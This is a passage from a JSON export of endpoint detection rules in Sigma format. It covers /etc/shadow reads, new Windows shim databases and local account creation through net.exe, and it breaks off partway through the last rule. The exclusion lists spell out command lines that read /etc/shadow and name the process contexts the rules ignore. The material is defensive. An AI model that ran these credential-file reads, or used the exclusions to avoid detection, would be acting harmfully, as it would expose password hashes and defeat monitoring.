'/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n exclusion_qualys2:\n ProcessCommandLine:\n - 'grep ^root:[\\*!]: /etc/shadow'\n - 'grep -E ^\\\\+: /etc/shadow'\n - 'grep -E ^root:[\\\\\\*\\\\!]: /etc/shadow'\n - 'grep -E ^[[:blank:]]\\*\\\\+ /etc/shadow'\n - 'grep -E ^[^:]+:[^\\\\!\\*] /etc/shadow'\n - '/bin/sh /usr/bin/egrep ^[^:]+:[^\\\\!\\*] /etc/shadow'\n - 'awk -F: {print $1?:?$5} /etc/shadow'\n - 'awk -F: ($2 == \"\"){print \"/etc/shadow:\"$1\":Second field is empty\"} /etc/shadow'\n - 'awk -F: -v user=* {if ($1==user) print $1\":\"$7} /etc/shadow'\n # awk -F: {if (NR==FNR){if ($2 ~ /^(\\!|\\*)/) a[$1]=\"locked\"; else a[$1]=\"active\"} else {if($7 ==\"/sbin/nologin\" && a[$1] == \"locked\"){a[$1]=\"disabled\";} print $1\":\"a[$1]\":\"$7}} /etc/shadow /etc/passwd\n # awk -F: {if (NR==FNR){if ($2 ~ /^(\\!|\\*)/) a[$1]=\"locked\"; else a[$1]=\"unlocked\"} else if($3 < 500 && $1 != \"root\") {print $1\":\"a[$1]\":\"$7}} /etc/shadow /etc/passwd\n - 'awk -F: {if (NR==FNR){if ($2 ~ *$7}} /etc/shadow /etc/passwd'\n ProcessParentImage:\n - '/usr/bin/dash'\n - '/usr/bin/bash'\n ProcessGrandparentImage:\n - '/usr/bin/dash'\n - '/usr/bin/bash'\n exclusion_qme:\n ProcessImage: '/opt/impser/vpom/bin/qme'\n exclusion_update-notifier:\n ProcessCommandLine: '/usr/bin/perl -w /bin/debconf-communicate -fnoninteractive update-notifier'\n ProcessGrandparentCommandLine: '/bin/sh /etc/cron.daily/update-notifier-common'\n exclusion_zimbra:\n ProcessCommandLine|startswith: '/usr/bin/perl -w /opt/zimbra/libexec/zmstat-fd'\n exclusion_pg_ctlcluster:\n ProcessCommandLine:\n - '/usr/bin/perl -wT /usr/bin/pg_ctlcluster *'\n - '/usr/bin/perl -wT /usr/bin/pg_lsclusters -h'\n - '/usr/bin/perl -wT /usr/bin/pg_lsclusters'\n exclusion_oracle1:\n - ProcessImage|endswith:\n - '/app/grid/perl/bin/perl'\n - '/app/grid/19*/perl/bin/perl'\n - ProcessCommandLine|contains:\n - '/u01/app/*/bin/acfsload'\n - '/u01/app/*/perl/bin/perl* acfsload'\n - '/orabin/grid/*/perl/bin/perl* acfsload'\n - '/orabin/grid/*/perl/bin/perl* diagsnap'\n - '/u01/app/oracle/*/sbin/nmo'\n - '/app/oracle/product/agent_*/agent_*/sbin/nmo'\n - '/usr/lib/oracle/agent/agent_*/sbin/nmo'\n - 'perl /app/oracle.ahf/'\n - 'perl /opt/ahf/oracle.ahf/'\n - '/bin/perl /opt/oracle*/tfa/'\n - '/bin/perl /oracle*/tfa/'\n - '/u01/app/*/grid/tfa/*/tfa_home/bin/tfactl.pl'\n\n exclusion_oracle2:\n ProcessCommandLine|contains: '/bin/jssu -childpidfile'\n ProcessParentImage: '*/bin/oracle'\n ProcessGrandparentImage: '/usr/lib/systemd/systemd'\n exclusion_rshd:\n ProcessImage: '/usr/sbin/in.rshd'\n ProcessParentImage: '/usr/sbin/xinetd'\n exclusion_udscan:\n ProcessImage: '/opt/microfocus/Discovery/.discagnt/udscan'\n exclusion_man-db:\n ProcessParentCommandLine: '/bin/sh /var/lib/dpkg/info/man-db.postinst triggered /usr/share/man'\n exclusion_landscapemanager:\n ProcessCommandLine|contains: '/usr/bin/landscape-manager'\n exclusion_plesk:\n ProcessImage: '/usr/local/psa/admin/sbin/sys_auth'\n exclusion_bladelogic:\n ProcessAncestors|contains: '|/opt/bmc/bladelogic/RSCD/bin/rscd_full|'\n exclusion_nagios:\n - ProcessImage: '/usr/sbin/nrpe'\n - ProcessAncestors|contains: '|/usr/sbin/nrpe|'\n - ProcessCommandLine: '/bin/sh */nagios/libexec/'\n exclusion_idataagent:\n ProcessImage:\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n # https://github.com/microsoft/OMS-Agent-for-Linux\n exclusion_omsagent:\n ProcessCommandLine: '/opt/microsoft/omsagent/plugin/omsbaseline -d /opt/microsoft/omsagent/plugin/'\n ProcessGrandparentCommandLine: 'sh -c sleep 60 && /opt/microsoft/omsagent/plugin/omsbaseline -d /opt/microsoft/omsagent/plugin/'\n exclusion_popularity-contest:\n ProcessCommandLine: '/usr/bin/perl -w /usr/sbin/popularity-contest --su-nobody'\n exclusion_proxmox_backup:\n ProcessCommandLine: '/usr/lib/x86_64-linux-gnu/proxmox-backup/proxmox-backup-api'\n ProcessParentCommandLine: '/sbin/init'\n exclusion_slapd:\n ProcessCommandLine: '/bin/bash /usr/local/openldap/sbin/slapd-cli status'\n exclusion_updatedb:\n ProcessCommandLine: '/bin/sh /bin/updatedb.findutils'\n exclusion_esmith:\n ProcessCommandLine|contains:\n - '/usr/bin/perl /sbin/e-smith/'\n - '/usr/bin/perl /etc/e-smith/'\n - '/usr/bin/perl -w /etc/e-smith/'\n - '/usr/bin/perl -w /sbin/e-smith/'\n exclusion_miteam:\n ProcessCommandLine: '/usr/bin/perl /etc/cron.monthly/sas-miteam-expiry-notify'\n exclusion_mvf:\n ProcessCommandLine: '/usr/bin/perl /usr/mvf/bin/mvf-monitoring-tool'\n exclusion_ucserver:\n ProcessCommandLine: '/usr/bin/perl /etc/cron.daily/ucserver-miteam-stats-writer'\n\n # VT says distributed by vmware\n exclusion_vmware_at:\n ProcessImage:\n - '/usr/bin/at'\n - '/usr/bin/atd'\n exclusion_sapinst:\n ProcessCommandLine:\n - '/tmp/sapinst_exe.*.*/sapinstexe'\n - '/tmp/sapinst_exe.*.*/sapwebdisp pf=webdisp.pfl'\n exclusion_ade:\n ProcessCommandLine: 'bash -c sudo /usr/local/scripts/start_ade'\n exclusion_openldap:\n ProcessCommandLine|startswith: '/bin/bash /usr/local/openldap/sbin/slapd-cli'\n exclusion_eftpd:\n ProcessCommandLine:\n - 'eftpd -l -a -A -U backbone -F /opt/tx/fifo/eftp.fifo -c /opt/tx/conf/eftpd.conf'\n - 'eftpd -l -F /opt/tx/fifo/eftp.fifo -c /opt/tx/conf/eftpd.conf'\n exclusion_ttp:\n ProcessCommandLine|startswith: '/iiidb/software/tpp/bin/perl /iiidb/csd/itechmaint'\n exclusion_deepinstinct:\n ProcessCommandLine: '/opt/deepinstinct/bin/DeepManagementService'\n exclusion_zenidoc:\n ProcessCommandLine: 'screen -dmS *listen_o20.sh /zenidoc/zenreco/*/listen_o20.sh *'\n exclusion_webmin:\n ProcessCommandLine: '/usr/bin/perl */webmin/miniserv.pl*'\n\n exclusion_xinet:\n ProcessCommandLine: '/usr/sbin/xinetd -pidfile /run/xinetd.pid -stayalive -inetd_compat'\n exclusion_rsync:\n ProcessCommandLine: 'bash -c sudo -u root rsync --server -* --log-format=%i --delay-updates . *'\n\n exclusion_lynis:\n ProcessParentCommandLine:\n - '/bin/sh ./lynis audit system'\n - '/bin/sh /usr/bin/lynis audit system --cronjob'\n - '/bin/sh /usr/sbin/lynis audit system --cronjob'\n - '/bin/sh /usr/bin/lynis --quick --no-colors*'\n - '/bin/sh /usr/sbin/lynis --quick --no-colors*'\n\n exclusion_oar:\n # /usr/bin/perl /usr/lib/oar/sarko\n # /usr/bin/perl /usr/lib/oar/Almighty\n # /usr/bin/perl /usr/lib/oar/NodeChangeState\n # /usr/bin/perl /usr/lib/oar/oar_meta_sched\n # /usr/bin/perl /usr/lib/oar/finaud\n # /usr/bin/perl /usr/lib/oar/Leon\n # /usr/bin/perl /usr/lib/oar/oaraccounting\n # /usr/bin/perl /usr/lib/oar/bipbip *\n # /usr/bin/perl /usr/lib/oar/oarsub *\n # /usr/bin/perl /usr/lib/oar/oardel *\n # /usr/bin/perl /usr/lib/oar/oarnodesetting *\n # /usr/bin/perl -w /usr/lib/oar/oarstat -u\n # /usr/bin/perl -w /usr/lib/oar/oarstat -u *\n # /usr/bin/perl -w /usr/lib/oar/oarapi.pl\n # /usr/bin/perl /usr/lib/oar//schedulers/oar_sched_gantt_with_timesharing_and_fairsharing_and_quotas *\n # /usr/bin/perl /usr/sbin/oar-database --check\n ProcessCommandLine|startswith:\n - '/usr/bin/perl /usr/lib/oar/'\n - '/usr/bin/perl -w /usr/lib/oar/'\n - '/usr/bin/perl /usr/sbin/oar-'\n\n exclusion_spamd:\n ProcessCommandLine|startswith:\n - '/usr/bin/perl /usr/sbin/spamd'\n - '/usr/bin/perl -T -w /usr/sbin/spamd'\n\n exclusion_pure_ftpd:\n ProcessImage: '/usr/sbin/pure-ftpd'\n\n exclusion_rudder:\n - ProcessImage: '/opt/rudder/bin/cf-agent'\n - ProcessParentImage: '/opt/rudder/bin/cf-agent'\n - ProcessGrandparentImage: '/opt/rudder/bin/cf-agent'\n\n exclusion_rapid7:\n ProcessImage: '/opt/rapid7/ir_agent/components/insight_agent/*/ir_agent'\n\n exclusion_oarssh:\n ProcessCommandLine: 'perl - * oarexec'\n ProcessParentCommandLine: '/usr/sbin/sshd -f /etc/oar/sshd_config -o pidfile=/var/run/oar-node_sshd.pid -r'\n ProcessParentImage: '/usr/sbin/sshd'\n\n exclusion_tina:\n ProcessCommandLine:\n - '/tina/atempodedupengine/default/bin/.exe.ade_server'\n - '/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - '/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n\n exclusion_bacula:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_mitel:\n ProcessCommandLine: '/usr/bin/perl /opt/intertel/bin/uca_deployu_notifier.pl'\n\n exclusion_tiger:\n ProcessGrandparentCommandLine|startswith: '/bin/sh /usr/lib/tiger/'\n\n exclusion_omv_engined:\n - ProcessGrandparentCommandLine: 'omv-engined'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/omv-engined'\n\n exclusion_rkhunter:\n - ProcessParentCommandLine|contains: '/bin/rkhunter '\n - ProcessGrandparentCommandLine|contains: '/bin/rkhunter '\n\n exclusion_puppet:\n - ProcessImage|startswith: '/opt/puppetlabs/'\n - ProcessParentImage|startswith: '/opt/puppetlabs/'\n - ProcessCommandLine|contains:\n - '/usr/bin/puppet agent'\n - 'puppet agent: applying configuration'\n\n exclusion_gitlab_ruby:\n ProcessImage: '/opt/gitlab/embedded/bin/ruby'\n\n exclusion_cybereason:\n ProcessImage: '/opt/cybereason/sensor/bin/cbram'\n\n exclusion_patrol_agent:\n ProcessImage: '/opt/patrol/*/linux-*/bin/patrolagent'\n\n exclusion_microsoft_wdavdaemon:\n ProcessImage: '/opt/microsoft/mdatp/sbin/wdavdaemon'\n\n exclusion_lfd:\n ProcessCommandLine:\n - '/usr/bin/perl /usr/sbin/lfd'\n - 'lfd - sleeping'\n\n exclusion_crowdstrike:\n ProcessImage|startswith: '/opt/crowdstrike/falcon-sensor'\n\n exclusion_ossec:\n - ProcessImage: '/var/ossec/bin/ossec-syscheckd'\n - ProcessCommandLine:\n - '/var/ossec/bin/wazuh-syscheckd'\n - '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_lacework_datacollector:\n # /var/lib/lacework/6.11.0.21858/datacollector\n # /var/lib/lacework/6.7.6.19823/datacollector\n ProcessImage: '/var/lib/lacework/*/datacollector'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/local/bin/dockerd'\n - '/usr/bin/podman'\n - ProcessAncestors|contains:\n - '/var/lib/rancher/rke2/data/*/bin/containerd-shim-runc-v2|/'\n - '|/usr/bin/conmon|/usr/bin/podman|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/dockerd|'\n\n exclusion_pacemaker:\n - ProcessCurrentDirectory|startswith: '/var/lib/pacemaker/'\n ProcessGrandparentCommandLine|startswith: '/bin/sh /usr/lib/ocf/resource.d/heartbeat/'\n - ProcessCurrentDirectory|startswith: '/var/lib/pacemaker/'\n ProcessParentCommandLine|startswith: '/bin/sh /usr/lib/ocf/resource.d/heartbeat/'\n - ProcessParentImage: '/usr/libexec/pacemaker/pacemaker-execd'\n\n exclusion_hive_client:\n ProcessCommandLine|startswith:\n - '/usr/bin/python? /usr/local/bin/hive-client '\n - '/usr/bin/python?.? /usr/local/bin/hive-client '\n - '/usr/bin/python?.?? /usr/local/bin/hive-client '\n\n exclusion_ldirectord:\n ProcessName: 'ldirectord'\n ProcessCommandLine: '/usr/bin/perl -w /usr/sbin/ldirectord /etc/ha.d/ldirectord.cf status'\n\n exclusion_qpsmtpd:\n ProcessImage: '/usr/bin/perl'\n ProcessCommandLine|startswith: '/usr/bin/perl -tw /usr/bin/qpsmtpd-forkserver '\n\n exclusion_gapagent:\n ProcessCommandLine|startswith: '/usr/local/bin/perl /usr/local/bin/rcmd a_pgap windows/start_gap_agent.pl '\n\n exclusion_proxmox:\n - ProcessCommandLine: '/usr/lib/x86_64-linux-gnu/proxmox-backup/proxmox-backup-api'\n - ProcessCommandLine: 'pvedaemon'\n ProcessParentCommandLine: 'pvedaemon'\n - ProcessImage: '/usr/bin/perl'\n ProcessCommandLine:\n - '/usr/bin/perl /usr/bin/pmgdaemon start'\n - '/usr/bin/perl * /usr/bin/pvedaemon start'\n - 'pvedaemon worker'\n - 'pvedaemon'\n - 'pmgdaemon worker'\n - 'pmgdaemon'\n\n exclusion_agent:\n ProcessImage: '/usr/local/bin/agent'\n\n exclusion_systsem:\n ProcessParentImage: '/usr/lib/systemd/systemd'\n\n exclusion_detect:\n ProcessCommandLine|startswith: '/usr/bin/perl -w /opt/detect/bin/'\n\n exclusion_cyberwatch:\n - ProcessParentGrandparentCommandLine|startswith: 'python3 /usr/bin/cyberwatch-agent'\n - ProcessGrandparentGrandparentCommandLine|startswith: 'python3 /usr/bin/cyberwatch-agent'\n\n exclusion_tanium:\n - ProcessParentCommandLine|startswith:\n - '/bin/bash /opt/tanium/taniumclient/vb/tempunix_'\n - '/opt/tanium/taniumclient/taniumclient '\n - ProcessAncestors|contains:\n - '/opt/tanium/taniumclient/taniumclient'\n - '/opt/tanium/taniumclient/taniumspawnhelper'\n - '/opt/tanium/taniumclient/taniumcx'\n\n exclusion_grep:\n ProcessCommandLine:\n - 'grep * /'\n - 'grep * /etc'\n - 'grep * /etc/'\n\n exclusion_awk:\n ProcessImage: '/usr/bin/gawk'\n ProcessCommandLine|startswith:\n - 'awk -F: ($2 == \"\" ) { '\n - 'awk -F: $2~/^\\$.+\\$/{'\n - 'awk -F: ($2~/^\\$.+\\$/) {'\n\n exclusion_delete_user:\n ProcessCommandLine|startswith:\n - '/usr/bin/perl /usr/sbin/deluser '\n - '/usr/bin/perl -* /usr/sbin/deluser '\n\n exclusion_sympa:\n ProcessCommandLine|startswith: '/bin/perl /usr/local/sympa/bin/'\n\n exclusion_spamassassin:\n ProcessCommandLine|contains:\n - '/usr/bin/perl -T -w /bin/sa-learn '\n - '/usr/bin/perl -T -w /bin/sa-update'\n - '/usr/bin/perl -T -w /usr/bin/sa-update'\n - '/usr/bin/perl /usr/bin/pmg-smtp-filter'\n\n exclusion_salt_minion:\n ProcessCommandLine|contains:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n\n exclusion_cfengine:\n - ProcessParentImage: '/var/cfengine/bin/cf-execd'\n - ProcessAncestors|contains: '/var/cfengine/bin/cf-execd'\n\n exclusion_nessus:\n ProcessGrandparentCommandLine: 'sudo -u root -p Password: sh -c printf \"command_start_%s\" \"????????\"; cat /etc/shadow; printf \"command_done_%s\" \"????????\"'\n\n exclusion_convert2rhel:\n ProcessCommandLine|startswith:\n - '/usr/bin/python2 /bin/convert2rhel '\n - '/usr/bin/python2 /usr/bin/convert2rhel '\n\n exclusion_keepalived:\n ProcessParentImage: '/usr/sbin/keepalived'\n ProcessCommandLine|startswith: '/usr/bin/perl /usr/local/pf/bin/cluster/pfupdate'\n\n exclusion_zentyal:\n ProcessCommandLine: '/usr/bin/perl /usr/share/zentyal/shell $global->edition()'\n\n exclusion_nixos:\n - ProcessImage:\n - '/nix/store/*-accountsservice-*/libexec/accounts-daemon'\n - '/nix/store/*-sddm-unwrapped-*/libexec/sddm-helper'\n - '/nix/store/*-systemd-*/lib/systemd/systemd-executor'\n - ProcessParentImage: '/nix/store/*-switch-to-configuration-*/bin/switch-to-configuration'\n - ProcessGrandparentImage: '/nix/store/*-switch-to-configuration-*/bin/switch-to-configuration'\n\n exclusion_salt:\n ProcessCommandLine|startswith: '/usr/bin/python* /var/lib/salt-bootstrap/salt-call '\n\n exclusion_oracle_grid:\n ProcessAncestors|contains: '/app/*/grid/bin/orarootagent.bin'\n\n condition: selection and 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4af5cd27-b69e-4679-a1b5-b6f72cc439aa",
"rule_name": "File /etc/shadow Read",
"rule_description": "Detects an attempt to read /etc/shadow.\nThis file contains the encrypted passwords of all the accounts on the system.\nThe content of this file is often used to gather information about the system and for offline password cracking.\nIt is recommended to ensure that the process accessing this file is legitimate and that it will keep its content secret.\n",
"rule_creation_date": "2022-11-16",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.008",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4b15d896-f348-4de9-ad85-28eb72a667dd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624760Z",
"creation_date": "2026-03-23T11:45:34.624762Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624766Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://strontic.github.io/xcyclopedia/library/sdbinst.exe-9A081E86E9FF0AA957EDA8E8D0624BAC.html",
"https://redcanary.com/blog/detecting-application-shimming/",
"https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html",
"https://blog.f-secure.com/hunting-for-application-shim-databases/",
"https://attack.mitre.org/techniques/T1546/011/"
],
"name": "t1546_011_new_shim_database.yml",
"content": "title: New Shim Database Installed\nid: 4b15d896-f348-4de9-ad85-28eb72a667dd\ndescription: |\n Detects the installation of a new shim database on the system.\n Application shims are used by Microsoft to allow backward compatibility of applications on differing Windows version.\n Attackers can register a malicious shim database to establish persistence or to elevate privileges.\n It is recommended to investigate the added shim database and the execution context of the detected process to determine the legitimacy of this action.\nreferences:\n - https://strontic.github.io/xcyclopedia/library/sdbinst.exe-9A081E86E9FF0AA957EDA8E8D0624BAC.html\n - https://redcanary.com/blog/detecting-application-shimming/\n - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\n - https://blog.f-secure.com/hunting-for-application-shim-databases/\n - https://attack.mitre.org/techniques/T1546/011/\ndate: 2022/10/24\nmodified: 2025/12/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.011\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\{????????-????-????-????-????????????}\\DatabasePath'\n\n exclusion_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_sdbinst_program_files:\n ProcessCommandLine|startswith:\n - 'sdbinst.exe *:\\Program Files\\'\n - '?:\\WINDOWS\\System32\\sdbinst.exe *:\\Program Files\\'\n - '?:\\WINDOWS\\SysWOW64\\sdbinst.exe *:\\Program Files\\'\n - 'sdbinst.exe *:\\Program Files (x86)\\'\n - '?:\\WINDOWS\\System32\\sdbinst.exe *:\\Program Files (x86)\\'\n - '?:\\WINDOWS\\SysWOW64\\sdbinst.exe *:\\Program Files (x86)\\'\n\n exclusion_fp:\n ProcessCommandLine:\n - 'rundll32.exe acmigration.dll,ApplyMigrationShims'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe /preoobe'\n\n exclusion_sap:\n # C:\\Program Files (x86)\\SAP\\SapSetup\\Setup\\NwSapSetup.exe\n ProcessSigned: 'true'\n ProcessSignature: 'SAP SE'\n\n exclusion_kaspersky:\n ProcessImage: '?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Security for Windows Server\\kavfs.exe'\n\n exclusion_acmigration:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\sdbinst.exe -q ?:\\WINDOWS\\Panther\\MigrationShims\\MigShim2\\Migrating\\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb'\n\n exclusion_ztvoice:\n ProcessCommandLine: '?:\\windows\\system32\\sdbinst.exe -q ?:\\windows\\Speech\\Freedom Scientific ZtVoiceEnable Zt.sdb'\n\n exclusion_speech:\n ProcessCommandLine: '?:\\Windows\\system32\\sdbinst.exe -q ?:\\Windows\\Speech\\Freedom Scientific ZtVoiceEnable ZrWaveWriter.sdb'\n\n exclusion_driverstore:\n ProcessCommandLine: '?:\\Windows\\System32\\DriverStore\\FileRepository\\ipf_cpu.inf_amd64_????????????????\\ipf_uf.exe'\n\n exclusion_sigafinance:\n ProcessCommandLine: 'sdbinst -q SigaFinance.sdb'\n\n exclusion_testxpert:\n # Generic InstallShield\n ProcessParentImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\is-*\\setup.tmp'\n ProcessParentProduct: 'testXpert III'\n\n exclusion_aplus:\n ProcessCommandLine: '?:\\Windows\\SysWOW64\\sdbinst.exe -q ?:\\Users\\\\*\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\APlusUpdater.sdb'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4b15d896-f348-4de9-ad85-28eb72a667dd",
"rule_name": "New Shim Database Installed",
"rule_description": "Detects the installation of a new shim database on the system.\nApplication shims are used by Microsoft to allow backward compatibility of applications on differing Windows version.\nAttackers can register a malicious shim database to establish persistence or to elevate privileges.\nIt is recommended to investigate the added shim database and the execution context of the detected process to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-10-24",
"rule_modified_date": "2025-12-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4b16ffcc-7a4d-49a7-9018-19944c4ae417",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621989Z",
"creation_date": "2026-03-23T11:45:34.621991Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621995Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1136/001/"
],
"name": "t1136_net_create_local_account.yml",
"content": "title: Local User Account Created via net.exe\nid: 4b16ffcc-7a4d-49a7-9018-19944c4ae417\ndescription: |\n Detects the creation of a local user account via net1.exe.\n Adversaries may create a local account to maintain access to victim systems.\n It is recommended to analyze the parent process and more generally the execution context to look malicious content or actions.\nreferences:\n - https://attack.mitre.org/techniques/T1136/001/\ndate: 2021/03/15\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n selection_user:\n CommandLine|contains:\n - ' user '\n - ' users '\n selection_add:\n CommandLine|contains: '/add'\n\n # This is handled by another rule\n filter_domain:\n CommandLine|contains: '/domain'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Windows\\CCM\\CcmExec.exe'\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files\\ESET\\RemoteAdministrator\\Agent\\ERAAgent.exe'\n - '?:\\Program Files\\FusionInventory-Agent\\perl\\bin\\fusioninventory-agent.exe'\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n - '?:\\Program Files\\Pragma\\Telemote\\TelemoteService.exe'\n\n exclusion_ccm:\n - Ancestors|contains: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n CurrentDirectory:\n - '?:\\WINDOWS\\ccmcache\\\\*\\'\n - '?:\\ccmcache\\\\*\\'\n - Ancestors|contains: '?:\\Windows\\ccmcache\\\\*\\\\*|?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4b16ffcc-7a4d-49a7-9018-19944c4ae417",
"rule_name": "Local User Account Created via net.exe",
"rule_description": "Detects the creation of a local user account via net1.exe.\nAdversaries may create a local account to maintain access to victim systems.\nIt is recommended to analyze the parent process and more generally the execution context to look malicious content or actions.\n",
"rule_creation_date": "2021-03-15",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
